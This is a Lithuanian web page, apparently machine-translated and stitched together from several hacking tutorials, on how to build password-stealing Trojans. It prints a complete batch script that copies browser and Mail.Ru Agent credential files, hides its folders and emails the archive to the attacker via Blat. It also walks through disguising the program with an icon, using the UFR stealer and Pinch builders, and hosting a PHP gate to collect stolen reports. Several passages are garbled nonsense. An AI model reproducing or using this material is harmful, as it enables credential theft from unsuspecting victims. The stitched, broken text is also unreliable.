Kaip sukurti Trojos arklys, kuris vagia slaptažodžius. Trojos arklys, skirtas pavogti slaptažodžius, kūrimas
Šiame straipsnyje aprašysiu, kaip greitai ir be didelių sunkumų galite parašyti ir padaryti virusą, kuris vagia failus su slaptažodžiais ir siunčia visa tai į jūsų pašto dėžutę.
Pradėkime nuo to, kad virusas bus parašytas bat"e (CMD, galite pasiimti pagrindines komandas), tai yra įprastu tekstiniu failu ir bus vykdomas naudojant standartinį integruotą "Windows" interpretatorių - "komandinę eilutę “.
Norėdami parašyti tokį virusą, turite žinoti tikslią failų, kuriuos jis pavogs, saugojimo vietą, Blat komponentus, kuriuos galima atsisiųsti iš ne svetainės http://www.blat.net/ arba iš mūsų serverio, taip pat komponentas iš WinRaR archyvatoriaus Rar.exe (galite apsieiti ir be jo).
Atidarykite užrašų knygelę ir nukopijuokite ten šį kodą:
@echo off md %systemroot%\wincs md %SystemDrive%\pass\md %SystemDrive%\pass\opera\md %SystemDrive%\pass\Mozilla\md %SystemDrive%\pass\MailAgent\md %SystemDrive%\pass\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r kopija /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" kopija /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" kopija /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ kopija /y wand.dat %SystemDrive%\pass\opera\wand.dat kopija /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite kopija /y key3.db %SystemDrive%\pass\Mozilla\key3.db kopija /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite kopija /y %Windir%\Rar.exe %SystemDrive%\pass\Rar .exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\ pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u prisijungimas -pw Slaptažodis ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -pridėkite %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\ perduoti rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat.exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls
Apie patį įkrovos kodą daug nerašysiu.
@echo off - paslepia batinkos kūną (todėl jo nereikia, bet vis tiek)
md %systemroot%\wincs – sukuria wincs aplanką „Windows“ sistemos aplanke, neatsižvelgiant į tai, kokiame diske jis įdiegtas arba koks jo pavadinimas.
md %SystemDrive%\pass\ – sukuria leidimų aplanką diske, kuriame įdiegta Windows sistema.
md %SystemDrive%\pass\opera\ – sukuriamas aplankas opera, į kurį ateityje bus nukopijuoti „Opera“ naršyklės failai wand.dat ir cookies4.dat (iki 11* versijų, „Opera“ savo slaptažodžius saugo wand.dat faile)
md %SystemDrive%\pass\Mozilla\- sukuriamas Mozilla aplankas, kuriame ateityje bus kopijuojami failai iš naršyklės Mozilla (cookies.sqlite, key3.db, signons.sqlite), kuriuose saugomi slaptažodžiai.
md %SystemDrive%\pass\MailAgent\- sukuriamas MailAgent aplankas, į kurį bus nukopijuoti failai su susirašinėjimo istorija ir registro raktais (kurie saugo slaptažodžius) iš pašto agento.
md %SystemDrive%\pass\MailAgent\reg- sukuria reg aplanką
attrib %systemroot%\wincs +h +s +r- įdeda atributus į wincs aplanką, taip paslėpdamas jį nuo vaizdo.
attrib %SystemDrive%\pass +h +s +r- tas pats, kas aukščiau.
kopija /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- nukopijuoja failą blat.exe iš įkėlimo vietos į wincs aplanką
kopija /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- nukopijuoja failą blat.dll iš įkėlimo vietos į wincs aplanką
kopija /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- nukopijuoja failą blat.lib iš įkėlimo vietos į wincs aplanką
CD /D %APPDATA%\Opera\Opera\ - pereina į opera aplanką, kuriame yra failai su slaptažodžiais (ir kitais dalykais) operai.
nukopijuokite /y wand.dat %SystemDrive%\pass\opera\wand.dat- nukopijuoja failą wand.dat į opera aplanką
kopijuoti /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- nukopijuoja failą cookie4.dat į opera aplanką
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- eksportuoja registro raktą magent_logins2, kuriame saugomas slaptažodis, į reg aplanką
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- eksportuoja registro raktą magent_logins3, kuriame saugomas slaptažodis, į reg aplanką
CD /D %APPDATA% – eikite į AppData aplanką
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- nukopijuoja aplanko Mra\Base turinį į aplanką MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- nukopijuoja ver.txt failą į aplanką MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- eikite į aplanką su „Mozilla“ naršyklės profiliu
kopijuoti /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- nukopijuoja failą cookies.sqlite į Mozilla aplanką
kopija /y key3.db %SystemDrive%\pass\Mozilla\key3.db- nukopijuoja failą key3.db į Mozilla aplanką
kopijuoti /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- nukopijuoja failą signons.sqlite į Mozilla aplanką
kopija /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- nukopijuoja WinRar Rar.exe archyvavimo komponentą į leidimų aplanką
del /s /q %SystemRoot%\Rar.exe- pašalina archyvavimo komponentą iš Windows aplanko
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- archyvuokite leidimų aplanko turinį
kopija /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar nukopijuokite sukurtą archyvą į wincs aplanką
cd %systemroot%\wincs – eikite į wincs aplanką
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -prievadas 587 -f [email protected] -u login -pw Slaptažodis - parengia Blat programą archyvo siuntimui, nurodant duomenis autorizacijai ir laiško išsiuntimui Nepamirškite nurodyti savo duomenų iš pašto dėžutės, iš kurios bus laiškas su archyvu išsiųstas.
ren *.rar pass.rar – tik tuo atveju, jei proceso metu archyvas nepaėmė netinkamo pavadinimo, mes jį dar kartą pervadinsime į pass.rar
%systemroot%\wincs\blat.exe -body Files Password -to [email protected] -pridėkite %systemroot%\wincs\pass.rar- nurodyti, kokiu pašto adresu laiškas bus išsiųstas ir išsiųsti.
rmdir /s /q %SystemDrive%\pass- ištrinti leidimų aplanką
rmdir /s /q %systemroot%\wincs- ištrinkite wincs aplanką
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- pašalinkite „Blat“ komponentus iš „Windows“ aplanko.
del /s /q %systemroot%\blat.lib- pašalinkite „Blat“ komponentus iš „Windows“ aplanko.
attrib +a +s +h +r %systemroot%\wind.exe- Mes užsidedame atributus, taip pasislėpdami nuo akių.
IŠĖJIMAS – užbaigiame paketinį procesą ir išeiname.
cls - išvalykite bet kokių interpretatoriaus eilučių išvestį.
Nukopijuotas, išsaugotas kaip wind.bat ir sukompiliuotas į exe naudojant Bat to exe konverterio programą, tada viską sujungiame, tai yra, paimame Blat programos komponentus ir WinRar archyvavimo komponentą (galite atsisiųsti) ir juos suklijuojame vieną vykdomąjį failą arba su kuria bet kokia programa, visų failų įkėlimo kelias turi būti %SystemRoot% arba %WindowsDir% arba %windir% .
Dėl to gauname virusą, kurio nepaims antivirusinės programos ir atsiųsime archyvą su failais į Jūsų el.paštą.Failai, kurie atkeliauja el.paštu, gali būti iššifruoti naudojant kelių slaptažodžių atkūrimą, nors ne visus, bet tik wand.dat iš operos ir tada jei nebuvo atnaujintas iki 11*versijų.Visus kitus failus galima iššifruoti pakeitus juos savo.
Manau, galime baigti čia, bet jei turite klausimų, nedvejodami klauskite.
Ačiū už dėmesį, viso ko geriausio!
©SwAp TheHackWorld.in
Čia aš jums pasakysiu, kaip padaryti paprastą Trojos arklį, kad pavogtų slaptažodžius iš ICQ, Vkontakte, Odnoklassniki, Mail... ir tt, ir tt.
Pradėkime... pirmiausia mums reikia kelių programų:
Multi Password Recovery yra programa, skirta atkurti pamirštus slaptažodžius
blat yra el. pašto klientas.
Bat to Exe konverteris – bat-exe formato keitiklis.
Visa tai galite atsisiųsti viename archyve:
Norėdami matyti nuorodas, turite būti užsiregistravę.
Atsisiųskite ir išpakuokite į atskirą aplanką...
Dabar atidarykite failą "1.bat" su užrašų knygele... ir pakeiskite žodžius "Prisijungti" į savo prisijungimo duomenis iš "Yandex pašto"... ir pakeiskite žodį "Slaptažodis" į slaptažodį iš Yandex pašto...
Išsaugoti ir uždaryti...
Dabar atidarykite „Bat_To_Exe_Converter“...
Lauke „Paketinis failas“ nurodykite failą, kurį išsaugojote „1.bat“
Lauko „Išsaugoti kaip“ pakeisti negalima...
Nustatykite nustatymus, kaip parodyta toliau:
Dabar eikime į skirtuką „Įtraukti“...
Ir perkelkite ten visus failus iš „blat“ ir „MPR...“ aplankų.
Jų turėtų būti lygiai septyni!!!Kaip parodyta aukščiau!!!
Na, o dabar prie Trojos arklys pridėkime piktogramą... tai nėra būtina, bet tai labiau atrodo kaip kokia nors programa...
Eikite į skirtuką „Versijos informacija“ ir lauke „Icon fie“ pasirinkite piktogramą....
Spustelėkite "Sudaryti"...
Laukiame... kol bus baigtas atsisiuntimas... ir patikriname aplanką su failu "1.bat"... ten turėjo atsirasti jūsų Trojos arklys "1.exe" (galite vadinti kaip tik norite
)...
Na, o dabar patikrinkime... paleiskite Trojos arklys savo kompiuteryje ir palaukite... po 30 sekundžių... į jūsų el. paštą bus atsiųstas failas... atsisiųskite jį (jame saugomi slaptažodžiai)
Atsisiųsta... dabar paleidžiame per „MPR“ ir žavimės slaptažodžiais
Įsilaužimas Kaip sukurti Trojos virusą. Žiupsnelis (lameriams)
Konfliktas kilo, kai Trojos princas pagrobė Spartos karalienę Eleną ir paskelbė, kad nori padaryti ją savo žmona. Tai natūraliai supykdė graikus, ypač Spartos karalių. Graikai 10 metų apgulė Troją, bet nesėkmingai, nes... Troja buvo gerai įtvirtinta.
Paskutinėmis pastangomis graikų kariuomenė apsimetė besitraukianti ir paliko didžiulį medinį arklį. Trojos arklys pamatė arklį ir, manydami, kad tai graikų dovana, nutempė arklį į miestą, nesuvokdami, kad tuščiame mediniame žirgo viduje sėdi geriausi graikų kareiviai.
Tamsos priedangoje kariai išlipo, atidarė miesto vartus ir vėliau kartu su likusia kariuomene nukovė visą Trojos armiją.
Jauno administratoriaus užrašai
Prieš porą dienų vienas mano draugas ant mano kontaktinės sienos paliko grafičius su žinute, kad įsilaužė į mano paskyrą ir pan. buvo nuoroda į svetainę vk-****.msk.ru. Na taip. Žinoma.) Nedelsdamas jam parašiau, kad jis išgydytų ir pakeistų slaptažodį. Bet nuoroda vis tiek mane sudomino, nors tikrai žinojau, kad tai Trojos arklys (kas mane ir sudomino). Nusprendžiau sekti šią nuorodą. Dėl to man buvo pasiūlyta atsisiųsti programą, kuri neva pasinaudoja neseniai atrasta kontaktų pažeidžiamumu ir leidžia nulaužti bet kurią paskyrą.
Instrukcijos, kaip sukurti Trojos arklys slaptažodžiams pavogti
Trumpas pinigų vagystės iš internetinės bankininkystės vadovas Įsilaužimo teritorija: HackZona 2010 m. gruodžio 28 d. Viskas apie svetainių, tinklaraščių, forumų, internetinių parduotuvių kūrimą, jų reklamavimą Nežinau, ar tam reikia naudoti kažkokį Trojos arklys. mano namų slaptažodžiai yra labai sudėtingi, todėl tikiuosi, kad juos pavyks nulaužti. kilęs iš Ukrainos (Likpay registracija, apžvalgos ir galimybės) Trojos arklys, skirtas pavogti slaptažodžius, kūrimas! — YouTube 2012 m. lapkričio 1 d., jei nesuprantate, parašykite į Skype: comrad714 programos pavadinimas UFR stealer 3.0.1.0.
Kaip sukurti Trojos arklys
Pasiruoškite, turime parašyti dvi programas vienu metu. Vienas bus jūsų kompiuteryje (kliente), kitą reikės mesti aukai (serveriui). Bus daug darbo, taigi mažiau žodžių ir arčiau kūno.
Taigi, paleiskite „Delphi“ arba, jei jis jau veikia, sukurkite naują projektą („Failas“ – „Nauja programa“). Dabar pereisime prie Trojos arklys serverio dalies.
Čia turėtumėte perkelti „From1“ iš „Automatinio formų kūrimo“ skilties (sąrašas kairėje) į „Galimos formos“ (sąrašas dešinėje), kaip aš dariau.
Kaip sukurti Trojos arklys
Manau, kiekvienas skaitytojas žino posakio „Trojos arklys“ kilmę ir reikšmę. Trojos viruso veikimo principas yra maždaug toks pat (dėl to ir gavo savo pavadinimą). Yra daugybė šio viruso tipų, šiandien aš sutelksiu dėmesį į vieną iš Trojos arklys programos kūrimo, pagrįstos Aleksejaus Demčenkos arba, kaip jis dar vadinamas, „aka coban2k“, kuris yra daugybės autorius, raida. programų, įskaitant PINCH, kuris tapo labiausiai paplitusiu Trojos arkliu pasauliniame tinkle!
Kaip sukurti Trojos arklys.
Mes sukūrėme Trojos arklys ir dabar taip pat kuriame Trojos arklys, skirtas pavogti slaptažodžius!
Čia aš jums pasakysiu, kaip padaryti paprastą Trojos arklį, kad pavogtų slaptažodžius iš ICQ, Vkontakte, Odnoklassniki, Mail. ir tt 3A%2F%2Fs61.ucoz.net%2Fsm%2F6%2Fsmile.gif&hash=1b9ff09e365c561776d64317149701b5″ /%
Dabar atidarykite failą „1.bat“ naudodami užrašų knygelę. ir pakeiskite žodžius „Prisijungti“ į savo prisijungimo duomenis iš „Yandex“ pašto. ir pakeiskite žodį „Slaptažodis“ į savo „Yandex“ pašto slaptažodį.
Mes laukiam. atsisiuntimas baigtas.
Sukuriame Trojos arklys, kuris vagia visus slaptažodžius iš naršyklių (kaip buvo žadėta)
Taigi pirmiausia turime atsisiųsti UFR stealer programą, tai galite padaryti oficialioje svetainėje vazonez.com arba per nuorodą >> http://rghost.ru/55883641
Tada einame į „kūrimo parinktis“ ir spustelėkite keitimo piktogramą, kad mūsų Trojos arklys atrodytų kaip tikra programa, arba spustelėkite sujungti failus (aukai geriau paleisti programą, su kuria buvo suklijuotas Trojos arklys, ir kartu su programa pats Trojos arklys)
Trojos arklys, skirtas pavogti slaptažodžius, kūrimas
Viruso veikimo planas toks: jis paleidžiamas, nuskaito visus kompiuterio aplankus ir nukopijuoja reikiamus failus (pagal kaukę, pvz., *.txt. pass* ir kt.) į „flash drive“.
Įjungia išplėstinį komandų apdorojimo režimą, t. y. leidžia sudėtingas konstrukcijas, pvz., dvi komandas vienoje sąlygoje ir kitas. Nejuokink, nes Batch tai labai šaunu.
Tada turite atsiminti kelią į katalogą, iš kurio buvo paleistas paketinis failas (turime nukopijuoti duomenis į savo "flash drive", o ne į kokį nors standųjį diską), nes kitas kodas supainioja CD kintamojo reikšmę ( dabartinis darbo aplankas).
Trojos arklys darbo pabaigoje sukurs ready.txt failą, kad žinotume, jog jis baigė veikti (padarysim Trojos arklys nematomą, be pulto).
Trojos arklys už VKontakte slaptažodžio vagystę, atsisiųskite diegimo programą
Viename stulpelyje Trojos arklys už slaptažodžio vagystę „Contact“ blokuoja žaidimą PS3. Norėdami pavogti slaptažodį, Trojos arklys atsižvelgia į savininko geografines koordinates, kad pavogtų atpažintą medžiagą. Atsižvelgiant į vartotojo veiksmus, slaptažodis Trojos arklys leidžia suasmeninti ekraną bendravimui sistemoje.
Ryšiui, slaptažodžių trojos arklys ir automatinis derybų procesas suteikia pažangiausius kūrimo įrankius.
Trojos arklys slaptažodžių vagystei
Kaip ir biuro darbas, jis leidžia lengvai naršyti virtualaus disko pavidalu. „Active Control“ praneša apie produkto, skirto darbui su žymėmis, išleidimą. Linijinė erdvė apibrėžia tikslią jų vietą, kad būtų išvengta įsigijimo.
Power Batch ieško pagalbos temos srauto ribojimui. Gana didelis dydis kepykloje leidžia rodyti ataskaitas. Laikydami nuspaudę klavišus, kad atvėstų, slaptažodžio vagystės Trojos arklys, kaip ir individualus redagavimas, apima visišką duomenų perdavimą.
Trojos arklys Nr. 9
Antivirusinė stealer – išpakuokite šią programą, nukopijuokite 2 failus ir aplanką į „flash drive“ (Antivirus.bat,autorun.inf,prog) ir galėsite eiti su draugais su „flash drive“! Įdedate „flash drive“ į kompiuterį, spustelėkite „Antivirus.bat“, kai jis sustos, galite jį uždaryti ir išimti „flash“ diską, visi slaptažodžiai, kuriuos turite kompiuteryje, „flash drive“, jie bus saugomi „prog“ ” -> „log“ aplankas.
Žmonės!!!
Dabar aš jums pasakysiu, kaip sukurti savo Trojos virusą (beveik savo)! Ko tau reikia:
smegenys - 1 vnt., kompiuteris - 1 vnt., prieiga prie interneto - 1 vnt., Pinch (builder) - 1 vnt., serveris (Trojos ataskaitoms) - 1 vnt., Parseris (ataskaitoms iššifruoti).
Galbūt tai ir viskas...
Dabar, kaip visada, trumpa istorija.
Trojos arklys
..jie buvo žinomi maždaug prieš 33 šimtmečius
XII amžiuje prieš Kristų. Graikija paskelbė karą Trojos miestui.
Konfliktas kilo, kai Trojos princas pagrobė Spartos karalienę Eleną ir paskelbė, kad nori padaryti ją savo žmona. Tai natūraliai supykdė graikus, ypač Spartos karalių. Graikai 10 metų apgulė Troją, bet nesėkmingai, nes... Troja buvo gerai įtvirtinta.
Paskutinėmis pastangomis graikų kariuomenė apsimetė besitraukianti ir paliko didžiulį medinį arklį. Trojos arklys pamatė arklį ir, manydami, kad tai graikų dovana, nutempė arklį į miestą, nesuvokdami, kad tuščiame mediniame žirgo viduje sėdi geriausi graikų kareiviai.
Tamsos priedangoje kariai išlipo, atidarė miesto vartus ir vėliau kartu su likusia kariuomene nukovė visą Trojos armiją. Kaip medinis arklys, programa
Trojos arklys apsimeta, kad daro vieną dalyką, bet iš tikrųjų daro ką nors visiškai kitokio.
Aleksejus Demčenka – rusas Kul Chatskeris taip pat žinomas kaip „coban2k“
Daugelio programų autorius ir jo geriausia (mano nuomone) programa yra PINCH, labiausiai paplitęs Trojos arklys internete! Ypač moka daug programavimo kalbų: C++, Pascal, Delphi, MySQL, PHP, XML ir daug kitų. Apskritai patariu užeiti į jo asmeninę svetainę www.cobans.net, ten rasite šiek tiek informacijos apie jį.
Visų pirma, mes svarstome Pinch programą (Pinch 2.58)
Pinch 2.58 yra Builder, Trojos viruso kompiliatorius... nes... kūrimo programoje atakuosite tam tikras Trojos arklys... pvz.: vogti slaptažodžius iš ICQ, TheBat, FAT, naršyklės slapukų (šis populiariausias).
BET tai dar ne viskas Pinch taip pat gali: sukurti/redaguoti tam tikrą parametrą registre, ištrinti save baigus darbą, sukurti „Mėlynąjį mirties ekraną“ arba dar geriau sukurti serverį (konsolę) aukos kompiuteryje („BackDoor“). ), po kurio nukentėjusiojo kompiuteris yra jūsų nuosavybė (tiesiogine prasme). Galite vykdyti DDOS atakas per jo kompiuterį per jo IP adresą ir šiuo metu išlaikyti savo anoniminį suverenitetą.
Tik nemanykite, kad galite turėti tik vieną kompiuterį. Jų galite turėti tiek, kiek norite, bet tai jau vadinama BotNet...
Na, tai viskas, pradėkime...
Pažiūrėkite, kaip atrodo Pinch Builder:
1.1 pav
Pridėta po 55 sekundžių
Dabar paaiškinsiu, kaip veikia Trojos arklys...
1. Galite sukompiliuoti Trojos arklys taip, kad ataskaitos būtų siunčiamos jūsų nurodytu el. Bet jie gali jus sudeginti (tai yra jūsų Trojos arklys), nes... jūsų auka gali turėti SP2 („Windows XP Service Pack 2“)), o tai reiškia, kad „FireWall“ taip pat turi... „FireWall“ niekada neįjungs (be jūsų leidimo) 25 prievado (SMTP), o tai reiškia, kad jūsų Troja negalės išsiųsti aukos pranešimo paštas. (tokie žinomi pašto siuntėjai, kaip mail.ru, yandex.ru ir kt., negauna ataskaitų) Naudokite el. pašto adresą http://goolook.ru Bet vis tiek nerekomenduoju naudoti SMTP!
2. Galite kompiliuoti Trojos arklys taip, kad ataskaitos būtų siunčiamos į jūsų nurodytą serverį.
Tai saugiau, nes pranešimo siuntimo metu Pinch pasireiškia kaip:
Proceso pavadinimas: iexplorer.exe
Protokolas: http
Nuotolinis adresas: www.YOUR_SERVER.xxx/get.php
Ugniasienė negali užkirsti kelio „iexplorer.exe“ procesui (ir jei galėtų, nieko nematysite savo kompiuterio monitoriuje (išskyrus darbalaukio paveikslėlį))
Protokolas: http:// reiškia prievadą „80“ (JOKIŲ KOMENTARŲ)
Taigi, šiandien pažvelgsime į „2-ą“, aš jau sakiau taip (?), kad tai geriau.
Pažvelkime į daugiau „Builder“ lenktynių >>>
1.1 pav
1. Spustelėkite skirtuką „HTTP“ ir pasirinkite „HTTP“ protokolą.
2. URL laukelyje įveskite savo svetainės (serverio) adresą, pavyzdžiui: http://kuzia_lox.jino-net.ru/mailp_p/mail.php
Mes sutelksime dėmesį į tai išsamiau...
Kad Pinch atsiųstų jums ataskaitas per http://, jums reikia serverio (paprasčiausiai pavadinkime jį „svetaine“), taigi jums reikia svetainės, KURIOS PHP STRAIPTAI TURI PRIVALOMA VEIKTI!!! Geriausias iš jų yra http://jino-net.ru
Tiesa, sakiau, kad yra ir http://onepage.ru/, bet serveris buvo sunaikintas.
Tęskime...
Taigi, užsiregistruokite http://jino-net.ru naudodami bet kurį domeną ir bet kokį slaptažodį J).
Ar prisiregistravote?
Aš manau, kad taip…
Tęskime...
Tarkime, kad užsiregistravote domene http://petia_lox.jino-net.ru
Einame į jūsų svetainės FTP. Ar žinote, kas yra FTP? Echhh... Turiu tau pasakyti, nes prisimenu save...
FTP yra jūsų svetainės turinys... tai yra, naudodamiesi FTP protokolu (21 prievadu), pateksite į savo svetainės šaknį, kurioje yra įvairūs katalogai/aplankai/failai ir pan.
Eikime į Google.ru ir atsisiųskite „CuteFTP“ programą... Galbūt aš tai padarysiu už jus.
Eime čia >>>
http://www.google.ru/search?hl=ru&q=CuteFTP+download&btnG=Search+in+Google&lr=
Man labiau patinka 4 nuoroda.
Atsisiųskite CuteFTP 7.1 + Russifier
Eime >>>
http://gizmodo.ru/2005/07/23/skachat_cuteftp_7_1__rusifikator/
Manau, kad toliau jūs išsiaiškinsite, kaip atsisiųsti programą ir kaip ją įdiegti.
Pridėta po 1 minutės
Atsisiųsta, įdiegta, rusifikuota... tęsime...
Dabar eikite į savo svetainės FTP. Eikite į aplanką /docs/, sukurkite bet kurį aplanką šiame aplanke, pavyzdžiui „mail_p“, suteikite šiam aplankui teises CHMOD 777 (kontekstiniame meniu spustelėkite aplanką dešiniuoju pelės klavišu, suraskite parametrą „CHMOD“ arba „Ypatybės“ skirtingose CuteFTP programos versijose, skirtingi vertimai)
Dabar įkelkite į šį aplanką (mail_p). Kas yra gauti?
„Gauti“ šis vartų scenarijus, skirtas ataskaitoms iš pinch gauti, turi plėtinį „.php“
Jį galite gauti čia >>>
http://pinch3.ru/other/gate.txt
Kompiuteryje sukurkite Notepad tekstinį failą ir nukopijuokite vartų tekstą
http://pinch3.ru/other/gate.txt<<< в свой текстовый фаил >>> suteikite plėtinį tekstiniam failui.php (anksčiau jis buvo .txt)
Scenarijus paruoštas, pervadinkite jį į „mail“ ir įkelkite į savo svetainės FTP aplanke /docs/mail_p/
Ir suteikite CHMOD teises į šį failą 777.
Prisiminkite šią vietą, dabar ataskaitos bus siunčiamos į šį aplanką, kuriame yra failas (/docs/mail_p/).
Taigi mes rašome URL laukelyje (jei dar nepamiršote, kūrimo priemonėje)
http://petia_lox.jino-net.ru/mail_p/mail.php (turite savo adresą)
3. Pažiūrėkime >>>
1.2 pav
Pažymėkite visus žymimuosius langelius, kaip aš turiu 1.2 pav
Nepažymėkite laukelio virš parametro „Opera“, kitaip ataskaita nebus iššifruota (skaitykite toliau).
Jau galima kompiliuoti... bet pažiūrėsime ir į kitas papildomas (nors kartais net privalomas) funkcijas...
„PWD“ skirtuke mes jau žinome, kas tai yra)
Skirtukas „Vykdyti“ skirtas, tarkime, „Pinch“ intelektui pagerinti, tai yra, norint ištrinti save, išsaugoti .dll sistemoje „Windows“ ir dar daugiau.
Šnipo skirtukas. Išsiųskite aukos monitoriaus ekrano kopiją, kad išsaugotumėte IE KeyLog ir pan.
„NET“ skirtukas, skirtas PHP konsolės komandoms pranešti / aš nežinau kitų...
Mano mylimas BegDoras niekada nenaudojo Pinch'a skirtuko „BD“...
Skirtukas „etc“, skirtas suspausti Trojos arklį, pakeisti Trojos arklys.
Skirtukas „Nužudyti“, skirtas naikinti bet kokius procesus (pvz., „FireWall“)
Skirtukas „IE“: valdykite IE, įtraukite svetainę į parankinius, spustelėkite nuorodą.
Nežinau skirtuko „Sliekas“... kažkas susiję su DNSsec.
Skirtukas „IRC-bot“ iš esmės yra skirtas „bottrack“. BOTNET taisyklės)!!!
Grįžkite į PWD skirtuką ir spustelėkite mygtuką (apačioje) „COMPILE“
HOORA!!! TROJAN PARUOŠTA!!!
